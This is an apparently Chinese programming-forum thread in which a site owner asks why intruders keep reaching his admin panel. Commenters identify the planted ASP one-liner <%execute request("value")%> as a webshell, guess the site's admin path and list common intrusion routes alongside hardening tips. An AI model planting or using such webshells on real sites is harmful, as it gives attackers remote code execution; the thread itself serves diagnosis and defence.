日期:2014-05-17  浏览次数:20898 次

急,帮我检查网站的漏洞,顶者有分
网站的网址是:http:www.home77.com
以前被人上传过木马,后来都被我清掉了,我是用木马扫描器清除的,现在还是有人能进后台,我不知道是怎么进的,难道我的网站有漏洞吗?我确实找不到是什么原因,请大家帮帮忙,能否找到我的网站后台地址,能否注入等,昨天晚上有人进入了后台,乱改一通,在新闻的作者里加上<%execute   request( "value ")%>,其他的地方也加了,加这个东西是做什么用的?谢谢!

------解决方案--------------------
传说中的一句话木马,帮顶了!
------解决方案--------------------
你后台安全有问题,数据库是MDB改ASP的
有时间可以聊聊
QQ:77273364
------解决方案--------------------
帮忙顶一下
------解决方案--------------------
你要对用户的所有输入进行尽可能严格的验证,并且,把这些输入的数据,进行必要的转换,防止输入式攻击。有兴趣加我QQ125800731,注明CSDN
------解决方案--------------------
怕怕。。


------解决方案--------------------
楼主最好也能找些安全工具扫描一下你的服务器的漏洞,不一定完全就是你的网站的问题,很多时候服务器也会造成入侵
------解决方案--------------------
MDB数据库防在站点外或者改名为global.asa放在二级目录下面,不要防在根目录下,回打不开网站!
------解决方案--------------------
为何打不开你的网站
------解决方案--------------------
<%execute request( "value ")%>

用来执行request到的文件名
------解决方案--------------------
http://www.home77.com/admin/
很显然
管理页面在这个目录下
------解决方案--------------------
网站都打不开.
情况无非有以下几种:
1.后台密码别人已经知道.可以通过添加文章来~~
2.权限已经被别人拿了.没有办法。慢慢找了。当然也有工具。
3.服务器权限被别人拿了。这个!!嘿嘿!!!
------解决方案--------------------
现在是能打开了,我这边是网通的,有点慢。
自己找吧!都TMD星期六大家还工作。
------解决方案--------------------
网站很齐整,~~

树大招风,劝你找高手解决下..

http://www.xfocus.net/

这个站高手多...
------解决方案--------------------
LZ是在东莞工作?
------解决方案--------------------
up ..
------解决方案--------------------
execute request( "value ")

这个东东用处大了....
我从本机建一个html文件。
随便写一段xxx的代码,用表单post到你的页面上去。
------解决方案--------------------
1、注入
2、上传
3、数据库写一句话小马
4、服务嚣本身安全
5、ser-u安全
6、后以密码简单
7、备份木马
8、SQL 溢出
9、SQL差异备份木马
10、IIS可写木马
11、旁注入侵
www.virus8.net/gd
------解决方案--------------------
看了楼上的顿悟,execute还有这用法。
MARK下,帮顶。
------解决方案--------------------
这个就是传说中的一句话木马,你搜索下就知道了。有很多的变形..
------解决方案--------------------
网站打开速度非常慢
------解决方案--------------------
海阳ASP木马好象就是这样的.
------解决方案--------------------
有分干嘛不顶
------解决方案--------------------
我也顶,关注一下,很想知道是如何攻击别人的网站的.